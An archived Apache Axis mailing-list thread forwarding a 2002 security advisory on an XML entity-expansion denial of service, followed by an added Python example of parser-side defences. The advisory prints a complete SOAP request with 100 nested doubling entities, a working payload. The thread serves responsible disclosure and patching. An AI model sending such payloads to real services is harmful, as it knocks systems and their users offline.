Tom/Dims,

Could you folks verify this and report back to [EMAIL PROTECTED] that
each of those is 100% taken care of?

Then security@ can report back to the various constituencies, work with
CERT if that is needed, etc. If you have any thoughts/statement which need
to be added - make sure you add that.

Dw

On Tue, 26 Nov 2002, Davanum Srinivas wrote:

> I think tom fixed it (http://marc.theaimsgroup.com/?l=axis-dev&m=103773176108393&w=2)
>
> Thanks,
> dims
>
> --- Ted Leung <[EMAIL PROTECTED]> wrote:
> > This security alert came through today.
> >
> > Ted
> > ----- Original Message -----
> > From: "Ian Holsman" <[EMAIL PROTECTED]>
> > To: <[EMAIL PROTECTED]>
> > Cc: "Ory Segal" <[EMAIL PROTECTED]>
> > Sent: Tuesday, November 26, 2002 8:02 AM
> > Subject: Security Alert - Apache/Axis
> >
> >
> > > Dear [EMAIL PROTECTED],
> > >
> > > During a recent security audit at one of our customers, Sanctum found a
> > > security vulnerability in your product Apache/Axis.
> > > The details of this vulnerability are described in the attached text file.
> > >
> > > We intend to issue a public advisory on BugTraq, SecuriTeam and other site
> > > forums about this vulnerability the last week of November.  Please note, the
> > > advisory will not contain specifics that might enable someone to exploit the
> > > vulnerability.
> > >
> > > We would appreciate it if you could issue a patch in that timeline (i.e.
> > > around November 25th), so it can be linked to our advisory.
> > >
> > > Please feel free to contact me for more information/help.
> > >
> > > Thanks,
> > > -Amit
> > >
> > >  <<XML_DTD_Axis.txt>>
> > >
> > >
> >
> >
> > > ---------------------------------------------------------------------
> > > To unsubscribe, e-mail: [EMAIL PROTECTED]
> > > For additional commands, e-mail: [EMAIL PROTECTED]
> > > ///////////////////////////////////////////////////////////////////////
> > ========================>> Security Advisory <<========================
> > ///////////////////////////////////////////////////////////////////////
> >
> >
> > => Author: Amit Klein - Sanctum inc. http://www.sanctuminc.com/
> >
> > => Release date: 14/Nov/2002
> >
> > => Vendor: Apache Group
> >
> > The following product was found to be vulnerable:
> >
> >   - Apache Axis SOAP server (checked with Xerces-J and Tomcat)
> >
> > The versions affected are the latest ones (as of October 2002).
> >
> > => Severity: High
> >
> > => CVE candidate: Not assigned yet.
> >
> > => Summary: Using the DTD part of the XML document, it is possible to cause the
> > XML parser to consume 100% CPU and/or a lot of memory, therefore resulting in
> > a denial of service condition.
> >
> > => Description: The DTD part of the XML document enables the document to define
> > named entities (other than the predefined &lt;, &gt;, etc.). The entities can be
> > defined using other entities (recursion is prohibited in XML 1.0).
> > Entities are expanded when they are referenced, inside the XML document.
> > The attack is comprised of defining and referencing an entity which is defined
> > using two instances of another entity, which is (in turn) defined as two instances
> > of yet another entity, and so on. This definition process can be repeated as long
> > as "necessary" - we found that nesting level of 100 is usually sufficient.
> > The 100th entity should be defined simply as a string. This has the effect of having
> > the first entity contain, in theory, 2^99 (two to the power of ninety nine)
> > concatenated values of the 100th entity.
> > Here's an example (the DTD is to be placed after the XML declaration, and before the
> > root element of the XML document):
> >
> >     <!DOCTYPE root [
> >     <!ENTITY x100 "foobar">
> >     <!ENTITY  x99 "&x100;&x100;">
> >     <!ENTITY  x98 "&x99;&x99;">
> >     <!ENTITY  x97 "&x98;&x98;">
> >     ...
> >     <!ENTITY   x3 "&x4;&x4;">
> >     <!ENTITY   x2 "&x3;&x3;">
> >     <!ENTITY   x1 "&x2;&x2;">
> >     ]>
> >
> > Referring to the first entity inside a document that would otherwise be accepted by
> > the application (using the syntax &x1;), results in a DoS condition, due to the
> > excessive CPU load and/or memory load required by the XML parser to expand this entity.
> >
> > => Solution: Not available yet.
> >
> > => Workaround: Not available yet.
> >
> > => Example:
> >
> > Ory Segal from Sanctum devised a SOAP request that manages to mount this attack requiring
> > only a path to an existing web service to be known to the attacker.
> >
> > The request is:
> >
> > POST path_to_web_service HTTP/1.0
> > Host: ...
> > Content-Type: text/xml
> > SOAPAction: ""
> > Content-Length: 3224
> >
> > <?xml version="1.0" ?>
> > <!DOCTYPE foobar [
> >     <!ENTITY x0 "hello">
> >     <!ENTITY x1 "&x0;&x0;">
> >     <!ENTITY x2 "&x1;&x1;">
> >     <!ENTITY x3 "&x2;&x2;">
> >     <!ENTITY x4 "&x3;&x3;">
> >     <!ENTITY x5 "&x4;&x4;">
> >     <!ENTITY x6 "&x5;&x5;">
> >     <!ENTITY x7 "&x6;&x6;">
> >     <!ENTITY x8 "&x7;&x7;">
> >     <!ENTITY x9 "&x8;&x8;">
> >     <!ENTITY x10 "&x9;&x9;">
> >     <!ENTITY x11 "&x10;&x10;">
> >     <!ENTITY x12 "&x11;&x11;">
> >     <!ENTITY x13 "&x12;&x12;">
> >     <!ENTITY x14 "&x13;&x13;">
> >     <!ENTITY x15 "&x14;&x14;">
> >     <!ENTITY x16 "&x15;&x15;">
> >     <!ENTITY x17 "&x16;&x16;">
> >     <!ENTITY x18 "&x17;&x17;">
> >     <!ENTITY x19 "&x18;&x18;">
> >     <!ENTITY x20 "&x19;&x19;">
> >     <!ENTITY x21 "&x20;&x20;">
> >     <!ENTITY x22 "&x21;&x21;">
> >     <!ENTITY x23 "&x22;&x22;">
> >     <!ENTITY x24 "&x23;&x23;">
> >     <!ENTITY x25 "&x24;&x24;">
> >     <!ENTITY x26 "&x25;&x25;">
> >     <!ENTITY x27 "&x26;&x26;">
> >     <!ENTITY x28 "&x27;&x27;">
> >     <!ENTITY x29 "&x28;&x28;">
> >     <!ENTITY x30 "&x29;&x29;">
> >     <!ENTITY x31 "&x30;&x30;">
> >     <!ENTITY x32 "&x31;&x31;">
> >     <!ENTITY x33 "&x32;&x32;">
> >     <!ENTITY x34 "&x33;&x33;">
> >     <!ENTITY x35 "&x34;&x34;">
> >     <!ENTITY x36 "&x35;&x35;">
> >     <!ENTITY x37 "&x36;&x36;">
> >     <!ENTITY x38 "&x37;&x37;">
> >     <!ENTITY x39 "&x38;&x38;">
> >     <!ENTITY x40 "&x39;&x39;">
> >     <!ENTITY x41 "&x40;&x40;">
> >     <!ENTITY x42 "&x41;&x41;">
> >     <!ENTITY x43 "&x42;&x42;">
> >     <!ENTITY x44 "&x43;&x43;">
> >     <!ENTITY x45 "&x44;&x44;">
> >     <!ENTITY x46 "&x45;&x45;">
> >     <!ENTITY x47 "&x46;&x46;">
> >     <!ENTITY x48 "&x47;&x47;">
> >     <!ENTITY x49 "&x48;&x48;">
> >     <!ENTITY x50 "&x49;&x49;">
> >     <!ENTITY x51 "&x50;&x50;">
> >     <!ENTITY x52 "&x51;&x51;">
> >     <!ENTITY x53 "&x52;&x52;">
> >     <!ENTITY x54 "&x53;&x53;">
> >     <!ENTITY x55 "&x54;&x54;">
> >     <!ENTITY x56 "&x55;&x55;">
> >     <!ENTITY x57 "&x56;&x56;">
> >     <!ENTITY x58 "&x57;&x57;">
> >     <!ENTITY x59 "&x58;&x58;">
> >     <!ENTITY x60 "&x59;&x59;">
> >     <!ENTITY x61 "&x60;&x60;">
> >     <!ENTITY x62 "&x61;&x61;">
> >     <!ENTITY x63 "&x62;&x62;">
> >     <!ENTITY x64 "&x63;&x63;">
> >     <!ENTITY x65 "&x64;&x64;">
> >     <!ENTITY x66 "&x65;&x65;">
> >     <!ENTITY x67 "&x66;&x66;">
> >     <!ENTITY x68 "&x67;&x67;">
> >     <!ENTITY x69 "&x68;&x68;">
> >     <!ENTITY x70 "&x69;&x69;">
> >     <!ENTITY x71 "&x70;&x70;">
> >     <!ENTITY x72 "&x71;&x71;">
> >     <!ENTITY x73 "&x72;&x72;">
> >     <!ENTITY x74 "&x73;&x73;">
> >     <!ENTITY x75 "&x74;&x74;">
> >     <!ENTITY x76 "&x75;&x75;">
> >     <!ENTITY x77 "&x76;&x76;">
> >     <!ENTITY x78 "&x77;&x77;">
> >     <!ENTITY x79 "&x78;&x78;">
> >     <!ENTITY x80 "&x79;&x79;">
> >     <!ENTITY x81 "&x80;&x80;">
> >     <!ENTITY x82 "&x81;&x81;">
> >     <!ENTITY x83 "&x82;&x82;">
> >     <!ENTITY x84 "&x83;&x83;">
> >     <!ENTITY x85 "&x84;&x84;">
> >     <!ENTITY x86 "&x85;&x85;">
> >     <!ENTITY x87 "&x86;&x86;">
> >     <!ENTITY x88 "&x87;&x87;">
> >     <!ENTITY x89 "&x88;&x88;">
> >     <!ENTITY x90 "&x89;&x89;">
> >     <!ENTITY x91 "&x90;&x90;">
> >     <!ENTITY x92 "&x91;&x91;">
> >     <!ENTITY x93 "&x92;&x92;">
> >     <!ENTITY x94 "&x93;&x93;">
> >     <!ENTITY x95 "&x94;&x94;">
> >     <!ENTITY x96 "&x95;&x95;">
> >     <!ENTITY x97 "&x96;&x96;">
> >     <!ENTITY x98 "&x97;&x97;">
> >     <!ENTITY x99 "&x98;&x98;">
> >     <!ENTITY x100 "&x99;&x99;">
> > ]>
> > <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
> > xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"
> > xmlns:xsd="http://www.w3.org/1999/XMLSchema">
> > <SOAP-ENV:Body>
> > <ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
> > <foobar xsi:type="xsd:string">&x100;</foobar>
> > </ns1:aaa>
> > </SOAP-ENV:Body>
> > </SOAP-ENV:Envelope>
> >
> >
>
>
> =====
> Davanum Srinivas - http://xml.apache.org/~dims/
>
>
>
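The advisory above lists no solution or workaround, and the thread does not say what Tom's Axis fix actually does. The following Python block is an added example, not code from the advisory, from Sanctum, or from the Axis/Xerces-J project: it rebuilds the nested-entity document at a configurable (constructed, much smaller) depth, computes the expansion the advisory describes (2^depth copies of the base string), and shows the two defender-side policies a SOAP endpoint can apply with the standard-library pyexpat parser: refusing any DOCTYPE outright, or, where a DTD must be accepted, capping the amount of character data the parser is allowed to deliver. All function and exception names are this example's own.

```python
import xml.parsers.expat


def build_nested_entity_doc(depth, base="hello"):
    """Constructed test input modelled on the advisory's DTD, shrunk to `depth`
    levels: x0 is a literal string and every x{i} is two copies of x{i-1}, so
    the single reference &x{depth}; expands to 2**depth copies of `base`."""
    decls = [f'<!ENTITY x0 "{base}">']
    for i in range(1, depth + 1):
        decls.append(f'<!ENTITY x{i} "&x{i - 1};&x{i - 1};">')
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE foobar [\n" + "\n".join(decls) + "\n]>\n"
        f"<root>&x{depth};</root>\n"
    )


def expanded_size(depth, base="hello"):
    """Characters the parser must materialise to expand &x{depth};
    (the advisory's 2^99 / 2^100 figure, generalised to any depth)."""
    return len(base) * 2 ** depth


class DoctypeRejected(ValueError):
    """Raised when an inbound document carries a DTD at all."""


class ExpansionBudgetExceeded(ValueError):
    """Raised when (expanded) content exceeds the caller's budget."""


def parse_rejecting_doctype(data):
    """Strict policy: abort on the DOCTYPE declaration itself, before any
    entity is declared, let alone expanded. Returns the character data of
    an accepted document. An exception raised inside a pyexpat handler
    propagates out of Parse(), which is what stops the parser."""
    parser = xml.parsers.expat.ParserCreate()
    chunks = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected(f"DOCTYPE {name!r} is not accepted on this endpoint")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.CharacterDataHandler = chunks.append
    parser.Parse(data, True)
    return "".join(chunks)


def parse_with_expansion_budget(data, max_chars):
    """Looser policy for services that must accept a DTD: count every
    character the parser delivers (expanded entities included) and abort
    as soon as the running total passes max_chars, so the 2**depth blow-up
    is cut off after at most max_chars characters of work."""
    parser = xml.parsers.expat.ParserCreate()
    chunks = []
    seen = 0

    def on_chars(text):
        nonlocal seen
        seen += len(text)
        if seen > max_chars:
            raise ExpansionBudgetExceeded(f"more than {max_chars} characters of content")
        chunks.append(text)

    parser.CharacterDataHandler = on_chars
    parser.Parse(data, True)
    return "".join(chunks)


if __name__ == "__main__":
    doc = build_nested_entity_doc(10)
    print("document bytes:", len(doc), "would expand to:", expanded_size(10), "chars")
    for policy in (parse_rejecting_doctype, lambda d: parse_with_expansion_budget(d, 4096)):
        try:
            policy(doc)
        except (DoctypeRejected, ExpansionBudgetExceeded) as exc:
            print("rejected:", exc)
```

The DOCTYPE-rejection policy is the cheaper of the two and is the right default for a SOAP endpoint, since SOAP envelopes have no legitimate need for an internal DTD subset; the budget policy is the fallback when a service has to keep accepting DTDs, and its limit should be set from the largest message the service genuinely expects.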
